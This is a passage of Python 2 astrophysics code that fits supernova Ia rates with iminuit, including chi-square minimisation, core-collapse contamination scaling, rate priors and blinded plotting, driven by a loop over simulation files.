{0}\".format(round(c2i, 4))\n\n \n elif self.Rate_Model == 'discrete':\n \n lamChi2 = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit )\n lamChi2Dump = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, dump = True, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)\n\n c2i, _ = lamChi2Dump(1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0)\n\n print \"Chi2 init = {0}\".format(round(c2i, 4))\n\n MinObj = M(lamChi2, f_1 = 1.0, error_f_1 = 1.0, limit_f_1 = (0.0, None), f_2 = 1.0, error_f_2 = 1.0, limit_f_2 = (0.0, None), f_3 = 1.0, error_f_3 = 1.0, limit_f_3 = (0.0, None), f_4 = 1.0, error_f_4 = 1.0, limit_f_4 = (0.0, None), f_5 = 1.0, error_f_5 = 1.0, limit_f_5 = (0.0, None), f_6 = 1.0, error_f_6 = 1.0, limit_f_6 = (0.0, None), f_7 = 1.0, error_f_7 = 1.0, limit_f_7 = (0.0, None), f_8 = 1.0, error_f_8 = 1.0, limit_f_8 = (0.0, None), f_9 = 1.0, error_f_9 = 1.0, limit_f_9 = (0.0, None), f_10 = 1.0, error_f_10 = 1.0, limit_f_10 = (0.0, None), f_11 = 1.0,error_f_11 = 1.0, limit_f_11 = (0.0, None))\n\n if self.Rate_Model == 'discrete':\n c2f, c2stor = lamChi2Dump(MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11'])\n else: \n print \"TEST DUMP HERE\"\n c2f, c2stor = lamChi2Dump(MinObj.values['k'], MinObj.values['Beta'])\n\n \n\n \n #MinObj = M(lamChi2, k = 1.0, fix_k = True, Beta = 0.0, error_Beta = 0.1)\n \n\n MinObj.set_strategy(2)\n\n fmin, param = MinObj.migrad(nsplit= 10)\n #fmin, param = MinObj.migrad()\n #ErrDict = MinObj.minos()\n\n \n self.covar = MinObj.np_covariance()\n\n ErrDict = MinObj.minos(maxcall = 1000)\n \n\n #plt.scatter(nData, c2stor)\n #plt.xlabel('nData')\n #plt.ylabel('chi2 in bin')\n #plt.savefig(self.realName + 'Chi2VsnData.png')\n #plt.clf()\n if self.nprint > simInd:\n print \"Shapes of things\"\n print len(c2stor)\n print nData.shape\n\n print dataBins.shape\n\n print self.binListFit.shape\n print self.binListSamp.shape\n #print DebugNIaPhot.shape\n #print DebugNCCPhot.shape\n #print DebugNIaTrue.shape\n #print DebugNCCTrue.shape\n\n for c2, nd in zip(c2stor, nData):\n self.globalChi2Storage.append(c2)\n self.globalNDataStorage.append(nd)\n\n if self.Rate_Model == 'discrete':\n fJList = [MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11']]\n fJErrList = [MinObj.errors['f_1'],MinObj.errors['f_2'],MinObj.errors['f_3'],MinObj.errors['f_4'],MinObj.errors['f_5'],MinObj.errors['f_6'],MinObj.errors['f_7'],MinObj.errors['f_8'],MinObj.errors['f_9'],MinObj.errors['f_10'],MinObj.errors['f_11']]\n\n \n self.fJList = fJList\n self.fJErrList = fJErrList\n self.Beta = None\n self.k = None\n self.kErr = None\n self.BetaErr = None\n print fJList\n print fJErrList\n else:\n k = MinObj.values['k']\n #kErr = MinObj.errors['k']\n kErr = (np.abs(ErrDict['k']['lower']) + np.abs(ErrDict['k']['upper']))/2.0\n Beta = MinObj.values['Beta']\n #BetaErr = MinObj.errors['Beta']\n BetaErr = (np.abs(ErrDict['Beta']['lower']) + np.abs(ErrDict['Beta']['upper']))/2.0\n if self.Rate_Model == 'brokenpowerlawVar':\n zBreak = MinObj.values['zBreak']\n zBreakErr = MinObj.values['zBreakErr']\n self.k = k\n self.Beta = Beta\n self.kErr = kErr\n self.BetaErr = BetaErr\n #/(self.nbins - 2)\n self.BetaRatio = (1+zCentersFit)**(Beta)\n self.fJList = None\n\n print 'SCALE DEBUG'\n print NCC\n print NIa\n print self.BetaRatio\n print 'SCALE DEBUG2'\n print np.sum(NCC)\n print np.sum(NIa)\n print np.sum(NIa*self.BetaRatio)\n self.fracCCData = (NCC*1.0)/(1.0*(1.0*NCC + NIa*self.BetaRatio))\n self.fracCCDataTot = (np.sum(NCC)*1.0)/(1.0*(1.0*np.sum(NCC) + np.sum(NIa*self.BetaRatio)))\n print 'SCALE DEBUG3'\n print self.fracCCData\n print self.fracCCDataTot\n print 'SCALE DEBUG4'\n print OrigNCC\n print np.sum(OrigNCC)\n print CCScale\n\n #print self.fracCCDataTot\n #print type(self.fracCCDataTot)\n #assert(type(self.fracCCDataTot) == float)\n print \"Chi2 final = {0}\".format(round(lamChi2Dump(self.k, self.Beta)[0], 4))\n self.chi2 = fmin.fval\n print \"Chi2final? = {0}\".format(round(fmin.fval, 4))\n\n\n\n if not(self.priorRate is None):\n ratePriorFinalVal = ratePrior(self.k*self.MCK, self.Beta+self.MCBeta, self.priorRate, self.priorZEff, self.ratePriorErrUp, self.ratePriorErrDown, self.ratePriorErrAll )\n c2NoPrior = chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, self.k, self.Beta, dump = False, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC)\n print \"RATE PRIOR FINAL\"\n print ratePriorFinalVal\n print \"Chi2final? = {0}\".format(round(fmin.fval, 4))\n print \"Chi2FinalNoPrior\"\n print c2NoPrior\n\n #fJs = np.ones(zCenters.shape)\n '''\n try:\n if (Rate_Model != 'discrete'):\n plt.clf()\n MinObj.draw_contour('k','Beta', nsigma=3)\n plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))\n if Blind:\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n plt.xticks(labels)\n locs, labels = plt.yticks()\n labels = locs + np.cos(cosVal)\n plt.yticks(labels)\n plt.clf()\n \n #xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)\n #fig, ax = plt.subplots(1)\n #plt.clf()\n #CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])\n #ax.clabel(CS, fontsize=7, inline=1)\n #ax.set_xlabel('k')\n #ax.set_ylabel('Beta')\n #if Blind:\n # ax.set_xticklabels([])\n # ax.set_yticklabels([])\n #plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))\n #plt.close()\n except: \n print \"Plot Fail A\"\n\n try:\n if (Rate_Model != 'discrete'):\n plt.clf()\n MinObj.draw_profile('Beta', text = False)\n if Blind:\n\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n plt.xticks(labels)\n plt.savefig('{0}_{1}_beta_contour.png'.format(self.realName, self.simName))\n plt.clf()\n except:\n print \"Plot Fail C\"\n try:\n if Rate_Model != 'discrete':\n Betas = np.linspace(self.Beta - 0.5, self.Beta + 0.5, 51)\n FCNs = []\n for bTemp in Betas:\n FCN = lamChi2( self.k, bTemp)\n FCNs.append(FCN)\n\n plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')\n plt.legend()\n plt.xlabel('Beta')\n plt.ylabel('Chi2')\n if Blind:\n\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n plt.xticks(labels)\n plt.savefig('{0}_{1}_beta_mycontour.png'.format(self.realName, self.simName))\n plt.clf()\n\n\n except:\n print \"Plot Fail D\"\n\n if Rate_Model != 'discrete':\n plt.clf()\n ax = plt.axes()\n Betas = np.linspace(self.Beta - 0.1, self.Beta + 0.1, 501)\n FCNs = []\n for bTemp in Betas:\n FCN = lamChi2( self.k, bTemp)\n FCNs.append(FCN)\n\n plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour')\n plt.legend()\n plt.xlabel('Beta')\n plt.ylabel('Chi2')\n if Blind:\n\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n ax.set_xticklabels(labels)\n print \"FCNs\"\n print FCNs\n plt.savefig('{0}_{1}_beta_myzoomcontour.png'.format(self.realName, self.simName))\n plt.clf()\n\n\n plt.clf()\n ax = plt.axes()\n ks = np.linspace(self.k - 0.1, self.k + 0.1, 501)\n FCNs = []\n for kTemp in ks:\n FCN = lamChi2( kTemp,self.Beta)\n FCNs.append(FCN)\n\n plt.plot(ks, FCNs, c = 'k', label = 'Non Minuit Contour')\n plt.legend()\n plt.xlabel('k')\n plt.ylabel('Chi2')\n \n print \"FCNs\"\n print FCNs\n plt.savefig('{0}_{1}_k_myzoomcontour.png'.format(self.realName, self.simName))\n plt.clf()\n\n\n\n df = np.array(FCNs[1:]) - np.array(FCNs[:-1])\n inds = np.where(df > 0)[0]\n print 'inds'\n print inds\n print inds < 250\n print np.where(inds < 250)\n inds = inds[np.where(inds < 250)]\n print 'inds'\n print inds\n print \"INDSSHAPE\"\n print inds.shape\n if inds.shape[0]:\n print \"MINUIT IS PROBABLY MAD. HERES WHY\"\n print inds\n print Betas[inds]\n if inds.shape[0] > 1:\n inds = inds[-1]\n print inds\n print Betas[inds]\n\n lamChi2Dump(self.k, Betas[inds -3])\n print \"MINUIT MAD 2\"\n lamChi2Dump(self.k, Betas[inds -2])\n print \"MINUIT MAD 3\"\n lamChi2Dump(self.k, Betas[inds -1])\n\n print \"MINUIT MAD 4\"\n lamChi2Dump(self.k, Betas[inds])\n print \"MINUIT MAD 5\"\n lamChi2Dump(self.k, Betas[inds + 1])\n print \"MINUIT MAD 6\"\n lamChi2Dump(self.k, Betas[inds + 2])\n print \"MINUIT MAD 7\"\n lamChi2Dump(self.k, Betas[inds + 3])\n print \"END MINUIT MAD\"\n \n\n\n\n try:\n if (Rate_Model != 'discrete'):\n plt.clf()\n MinObj.draw_mncontour('k','Beta', nsigma=3)\n plt.savefig('{0}_{1}_k_beta_mncontour.png'.format(self.realName, self.simName))\n if Blind:\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n plt.xticks(labels)\n locs, labels = plt.yticks()\n labels = locs + np.cos(cosVal)\n plt.yticks(labels)\n plt.clf()\n MinObj.draw_mnprofile('Beta', text = False, subtract_min = True)\n if Blind:\n \n\n locs, labels = plt.xticks()\n labels = locs + np.cos(cosVal)\n plt.xticks(labels)\n plt.savefig('{0}_{1}_beta_mncontour.png'.format(self.realName, self.simName))\n plt.clf()\n #xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)\n #fig, ax = plt.subplots(1)\n #plt.clf()\n #CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])\n #ax.clabel(CS, fontsize=7, inline=1)\n #ax.set_xlabel('k')\n #ax.set_ylabel('Beta')\n #if Blind:\n # ax.set_xticklabels([])\n # ax.set_yticklabels([])\n #plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))\n #plt.close()\n except: \n print \"Plot Fail B\"\n pass\n \n \n\n \n #plt.axhline(y = self.MCBeta, c = 'k', label = 'True Beta')\n #plt.axhline(y = Beta + self.MCBeta, c = 'g', label= 'Best Fit Beta')\n #plt.axvline(x = k, label = 'Best Fit k')\n ''' \n '''\n def chi2V2(self, fJs, fJErrs, zCenters, k, Beta):\n fitfJs = k*(1+zCenters)**Beta\n Chi2Temp = 0\n for fJ, fitfJ, fJErr in zip(fJs, fitfJs, fJErrs):\n Chi2Temp += (fJ - fitfJ)**2/(fJ + fJErr)\n return Chi2Temp\n '''\n\ndef weakPrior(value, priorTuple):\n if value < priorTuple[1]:\n if value > priorTuple[0]:\n return 1\n else: \n return (value - priorTuple[0])**4\n else:\n return (value - priorTuple[1])**4\n\ndef ratePrior(fitK, fitBeta, priorRate, zEffPrior, priorRateErrUp = None, priorRateErrDown = None, priorRateErrAll = None):\n\n print \"PRIOR\"\n print priorRate\n print zEffPrior\n print priorRateErrUp\n print priorRateErrDown\n print \"Fit Beta/k\"\n print fitBeta\n print fitK\n fitRate = fitK*(1+zEffPrior)**fitBeta\n print 'Fit Rate'\n print fitRate\n print \"PriorChi2\"\n\n if fitRate > priorRate:\n\n if not (priorRateErrUp is None):\n print (fitRate - priorRate)**2/priorRateErrUp**2\n return (fitRate - priorRate)**2/priorRateErrUp**2\n else:\n print (fitRate - priorRate)**2/priorRateErrAll**2\n return (fitRate - priorRate)**2/priorRateErrAll**2\n else:\n if not (priorRateErrDown is None):\n print (fitRate - priorRate)**2/priorRateErrDown**2\n return (fitRate - priorRate)**2/priorRateErrDown**2\n else:\n print (fitRate - priorRate)**2/priorRateErrAll**2\n return (fitRate - priorRate)**2/priorRateErrAll**2\n\n\n\n\n\n\n\ndef getCCScale(simCat, dataCat, MURESWindow = (-1, 1), zbins = [0.0, 0.3, 0.6, 0.9, 1.2], Beta = None, binList = None, fracCCData = None, outfilePrefix = 'Test', Rate_Model = 'powerlaw', f_Js = None, returnHist = False, debug = False, simInd = 100, ztype = 'zPHOT'):\n #import iminuit as iM\n #from iminuit import Minuit as M\n if debug:\n print \"Check this\"\n print Rate_Model\n print f_Js\n print Beta\n print fracCCData\n print \"Done Checking\"\n CCScales = []\n CCScaleErrs = []\n simIaHists = []\n simCCHists = []\n dataHists = []\n if not(f_Js is None):\n f_Js = np.array(f_Js)\n\n allSimCC = simCat[simCat['SIM_TYPE_INDEX'].astype(int) != 1]\n allSimIa = simCat[simCat['SIM_TYPE_INDEX'].astype(int) == 1]\n allData = np.copy(dataCat)\n\n\n #fnorm2 = float(dataCat.shape[0])/float(np.sum(simHist))\n \n simCat = simCat[(simCat['MURES'] < MURESWindow[0]) | (simCat['MURES'] > MURESWindow[1]) ]\n dataCat = dataCat[(dataCat['MURES'] < MURESWindow[0]) | (dataCat['MURES'] > MURESWindow[1]) ]\n \n\n for zl, zh in zip(zbins[:-1], zbins[1:]):\n\n tempSim = simCat[(simCat[ztype] < zh) & (simCat[ztype] > zl)]\n tempData = dataCat[(dataCat[ztype] < zh) & (dataCat[ztype] > zl)]\n\n\n allSimCCZbin = allSimCC[(allSimCC[ztype] < zh) & (allSimCC[ztype] > zl)]\n allSimIaZbin = allSimIa[(allSimIa[ztype] < zh) & (allSimIa[ztype] > zl)]\n if debug:\n print \"all Sim CC Zbin/IaZbin\"\n print allSimCCZbin.shape[0]\n print allSimIaZbin.shape[0]\n\n allDataZbin = allData[(allData[ztype] < zh) & (allData[ztype] > zl)]\n\n\n\n tempSimCC = tempSim[tempSim['SIM_TYPE_INDEX'] != 1]\n tempSimIa = tempSim[tempSim['SIM_TYPE_INDEX'] == 1]\n\n R = float(tempData.shape[0])/float(allDataZbin.shape[0])\n if debug:\n print \"R\"\n\n print R\n\n print \"Hist CC, outlier and total\"\n print tempSim.shape[0]\n print allSimCCZbin.shape[0]\n\n\n print \"pre Beta Correction allSimIa\"\n print tempData.shape[0]\n print allSimIaZbin.shape[0]\n\n if Rate_Model == 'discrete':\n hist, bins = np.histogram(allSimIaZbin[ztype], bins = 11)\n if debug:\n print 'fJ shape'\n print f_Js.shape\n print f_Js\n print hist\n print bins\n betaCorrAllSimIaZbin =np.sum(hist*f_Js)\n else:\n betaCorrAllSimIaZbin =np.sum((1+ allSimIaZbin[ztype])**Beta)\n #S = float(np.array(R*histSAllIa) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*histSAllCC))\n\n try:\n if debug:\n print \"Test S\"\n print R\n print betaCorrAllSimIaZbin\n print tempSimIa.shape[0]\n print tempSimCC.shape[0]\n print allSimCCZbin.shape\n print 'EEE'\n print np.array(R*betaCorrAllSimIaZbin)\n print 'DDD'\n print np.array(tempSimIa.shape[0])\n print 'CCC'\n print (np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))\n print \"AAA\"\n print (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))\n print \"BBB\"\n #S = (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))\n S = float(np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0]))\n except: \n S = np.nan\n if debug:\n print \"S WTF\"\n print S\n\n\n print \"Uncertainty Related Bullshit\"\n '''\n print \"Delta R\"\n\n dR = np.sqrt(histD + histDAll)\n\n print dR\n\n num1 = np.sqrt(np.sqrt((dR/R)**2 + histSAllIa) + tempSimIa.shape[0])\n\n num2 = np.sqrt(np.sqrt((dR/R)**2 + histSAllCC) + tempSimCC.shape[0])\n\n den1 = (R*histSAllIa - tempSimIa.shape[0])\n\n den2 = (tempSimCC.shape[0] - R*histSAllCC)\n\n\n dS = np.sqrt((num1/den1)**2 + (num2/den2)**2)\n '''\n #ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - histSAllIa*R)/(tempSimCC.shape[0] - R*histSAllCC)**2\n\n #ddNCC = np.sqrt(histSAllCC)*R*(histSAllIa*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2\n\n #ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)\n #ddNIa = np.sqrt(histSAllIa)*R/(tempSimCC.shape[0] - R*histSAllCC)\n\n ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - allSimIaZbin.shape[0]*R)/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2\n\n ddNCC = np.sqrt(allSimCCZbin.shape[0])*R*(allSimIaZbin.shape[0]*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2\n\n ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])\n ddNIa = np.sqrt(allSimIaZbin.shape[0])*R/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])\n\n #ddR = (histSAllIa*tempSimCC.shape[0] - histSAllCC * tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2\n\n dS = np.sqrt(ddnCC**2 + ddNCC**2 + ddnIa**2 + ddNIa**2)# + ddR**2)\n\n if debug:\n\n print \"ddnCC\"\n\n print ddnCC\n\n print \"ddNCC\"\n\n print ddNCC\n\n print \"ddnIa\"\n\n print ddnIa\n\n print \"ddNIa\"\n\n print ddNIa\n\n #print \"ddR\"\n\n #print ddR\n\n print \"Delta S\"\n\n print dS\n\n #assert(S > 0)\n if S < 0: \n S = np.nan\n if np.isnan(S):\n print 'SCALE IS NAN'\n if len(CCScales) > 0:\n #CCScales.append(CCScales[-1])\n CCScales.append(1.0)\n else: \n CCScales.append(1.0)\n else:\n CCScales.append(S)\n if type(dS) == np.ndarray:\n if np.isnan(dS[0]):\n CCScaleErrs.append(1.0)\n else:\n CCScaleErrs.append(dS[0])\n else:\n if np.isnan(dS):\n CCScaleErrs.append(1.0)\n else:\n CCScaleErrs.append(dS)\n\n #if debug:\n # print \"CC PlotDebug\"\n # print (simBinsCC[1:] + simBinsCC[:-1])/2.0\n # print simHistCC\n # print CCScales[0]\n # print dS\n # print fnorm2\n # print histD\n # print (muresBins[1:] + muresBins[:-1])/2.0\n \n #if simInd ==1:\n # plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, simHistCC*fnorm2, c = 'b', where = 'mid', label = 'prescaled Sim CC')\n # plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, CCScales[0]*simHistCC*fnorm2, c = 'g', where = 'post', label = 'postscaledSimCC')\n # plt.step((muresBins[1:] + muresBins[:-1])/2.0, histD, c = 'r', where = 'mid', label = 'data')\n # plt.legend()\n # plt.savefig(outfilePrefix + 'ScaledHist.png')\n # plt.clf()\n if debug:\n print \"CCScaleErrs\"\n print CCScaleErrs\n if returnHist:\n return CCScales, CCScaleErrs, simIaHists, simCCHists, dataHists\n return CCScales, CCScaleErrs\n\ndef applyCCScale(NCC, CCScales, CCScaleErrs, datazbins = None, zbins = None):\n if not(zbins is None):\n zbins = np.array(zbins)\n if not (datazbins is None):\n datazbins = np.array(datazbins)\n if type(CCScaleErrs) == list:\n CCScaleErrs = np.array(CCScaleErrs)\n if type(CCScales) == list:\n CCScales = np.array(CCScales)\n print 'CCScaleErrs'\n print CCScaleErrs\n print datazbins\n print zbins\n\n\n \n if type(CCScales) == np.ndarray:\n if CCScales.shape[0] == 1:\n NCCScaled = CCScales[0]*NCC\n else:\n if (datazbins is None) | (zbins is None):\n assert(0)\n if CCScales.shape[0] < 4:\n k = CCScales.shape[0] -1\n else:\n k = 3\n \n nancond = np.isnan(CCScales)\n if np.sum(nancond) > 0:\n CCScales[nancond] = 1.\n CCScaleErrs[nancond] = 1.\n\n zCenters = (zbins[1:]+ zbins[:-1])/2.0\n print zCenters\n print CCScales\n \n #spline = UnivariateSpline(zbins, CCScales, w = 1.0/CCScaleErrs, k = k)\n spline = UnivariateSpline(zCenters, CCScales, w = 1.0/CCScaleErrs, k = k)\n\n print datazbins.shape\n print datazbins\n print NCC.shape\n\n datazcents = (datazbins[1:]+ datazbins[:-1])/2.0\n\n NCCScaled = spline(datazcents)*NCC\n\n elif (type(CCScales) == int) | (type(CCScales) == float):\n NCCScaled = CCScales*NCC\n else:\n assert(0)\n\n NCCScaled = NCCScaled.clip(0)\n print NCCScaled\n\n assert(not bool(np.sum(NCCScaled < 0)))\n\n\n return NCCScaled\n\nif __name__ == '__main__':\n from sys import argv\n print \"argv\"\n print argv\n datadir = argv[1]\n simdir = argv[2]\n dataname = argv[3]\n print \"dataname\"\n simname = argv[4]\n print simname\n simgenfile = argv[5]\n print simgenfile\n NNCut = False\n cheatType = bool(int(argv[6]))\n cheatZ = bool(int(argv[7]))\n trueBeta = float(argv[8])\n paramFile = argv[9]\n cutFiles = [argv[10]]\n try:\n debug = bool(int(argv[11]))\n except:\n debug = False\n\n \n #if( ('Combine' in simdir) or ('SALT2' in simdir)) & (('Combine' in datadir) or ('SALT2' in simdir)):\n #NNCut = True\n #NNProbCut = 0.95\n \n #if len(argv) > 6:\n # NNCut = True\n # NNProbCut = 0.9\n # NNData = argv[6]\n # NNSim = argv[7]\n\n \n #default params\n\n zminFit = 0.1\n zmaxFit = 1.2\n zminSamp = 0.1\n zmaxSamp = 1.2\n MJDMin = 0.0\n MJDMax = np.inf\n bins = \"equalSize\" \n runFit = True\n fracContamCuts = [-1]\n fixBeta = True\n fixK = False\n nbins = None\n binList = None\n ScaleMuResCutLow = -1\n ScaleMuResCutHigh = 1\n #muresBins = 1\n muresBinsLow = 3\n muresBinsHigh = 3\n scaleZBins = [0.0, 1.2]\n nScaleZBins = None\n cheatCCSub = False\n cheatCCScale = False\n ZSysFlag = False\n Blind = False\n Rate_Model = 'powerlaw'\n MURESCuts = 2.0 #[(0.0, 0.8, -0.5, 0.5), (0.8, 1.5, -1, 1)]\n noCCMC = False\n fixCCScale = False\n trueMCBeta = 1.65\n trueMCK = 1.97E-5\n\n priorRate = None\n priorZEff = None\n ratePriorErrUp = None\n ratePriorErrDown =None\n ratePriorErrAll = None\n priors = None\n\n #override file\n\n params = open(paramFile, 'r').readlines()\n\n for p in params:\n\n print p\n exec(p)\n\n if nScaleZBins is None :\n redoScaleZBinFlag = False\n\n else:\n redoScaleZBinFlag = True\n\n if not(priors is None):\n if len(priors) == 3:\n priorRate, priorZEff, ratePriorErrAll = priors\n ratePriorErrUp = None\n ratePriorErrDown = None\n elif len(priors) == 4:\n priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown = priors\n ratePriorErrAll =None\n\n\n\n\n cosVal = 47392945716038.134971247\n kmean = []\n ksigma = []\n kErr = []\n BetaMean = []\n #BetaWeightMean = []\n #KWeightMean = []\n BetaSigma= []\n BetaErr = []\n zBreakMeans = []\n zBreakSigmas =[]\n zBreakErrs = []\n Chi2Mean = []\n Chi2Sigma = []\n f_JStorage = []\n f_JErrStorage = []\n SampleSizes = []\n\n CCScaleStorageGlobal = []\n CCScaleErrStorageGlobal = []\n\n\n #MURES_Cuts = [2.0]\n #MURES_Cuts = [1.0, 1.5, 2.0, 3.0, 4.0, 99.0, 2.0]\n #for MURES_Cut in MURES_Cuts:\n fcc = -1\n for cf in cutFiles:\n cuts = [] # cuts = [('FITPROB', 0.01, np.inf), ('NN_PROB_IA', NNProbCut, np.inf)]\n\n cutlist = open(cf, 'r').readlines()\n for l in cutlist:\n spl = l.split()\n cuts.append(('{0}'.format(spl[0]), float('{0}'.format(spl[1])), float('{0}'.format(spl[2]))))\n\n ks = []\n kErrs = []\n Betas = []\n BetaErrs = []\n zBreaks =[]\n zBreakErrs = []\n Chi2s = []\n\n CCScaleStorage = []\n CCScaleErrStorage = []\n\n\n nFail = 0\n simLoaded = False\n #print \"FUCK MPI\"\n #if Rate_Model == 'discrete':\n # subprocess.call(['python', 'constructChi2Func.py', str(nbins)], shell = False)\n #print \"MPI Fucked\"\n if '{' in datadir:\n if os.path.exists(datadir.format(98)):\n print \"MOAR SIMS\"\n nfile = 101\n else:\n print \"FEWAR SIMS\"\n nfile = 49\n else:\n nfile = 2\n for simInd in range(1,nfile):\n \n\n #print \"Sim {0}\".format(simInd)\n #SimBeta = 2.1 # simdir.split('_')[-3]\n #SimR0 = 1.7*10**-5 #simdir.split('_')[-5]\n #print \"Sim R0 = {1}; Sim Beta = {0}\".format(SimBeta, SimR0)\n\n \n print datadir.format(simInd)\n if simLoaded:\n try:\n \n RateTest.newData(datadir.format(simInd), dataname.format(simInd), simInd =simInd)\n if ZSysFlag:\n assert(0)\n RateTest.zSystematic(nbins = nbins, binList = binList)\n\n\n if redoScaleZBinFlag:\n\n RealCat = RateTest.postCutRealCat \n RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]\n\n zArray =RealOutlierCat[RateTest.ztype]\n zArray.sort()\n\n splitZs = np.array_split(zArray, nScaleZBins)\n\n #[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]\n\n scaleZBins = [splitZs[0][0]]\n\n \n for i in range(1,nScaleZBins):\n\n scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)\n scaleZBins.append(splitZs[i][-1])\n\n\n #RateTest.effCalc(nbins = nbins, fracContamCut = fcc, simInd =simInd)\n #RateTest.effCalc(nbins = 20)\n BetaIter = []\n BetaErrIter = []\n CCIter = []\n CCErrIter = []\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)\n if Rate_Model != 'discrete':\n if Blind:\n print \"Blinding A\"\n BetaIter.append(RateTest.Beta+ np.cos(cosVal))\n else:\n BetaIter.append(RateTest.Beta)\n BetaErrIter.append(RateTest.BetaErr)\n\n for iteration in range(nIter):\n if not fixCCScale:\n if not noCCMC:\n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n CCIter.append(CCScale)\n CCErrIter.append(CCScaleErr)\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)\n else:\n CCIter.append(0.0)\n CCErrIter.append(0.0)\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, 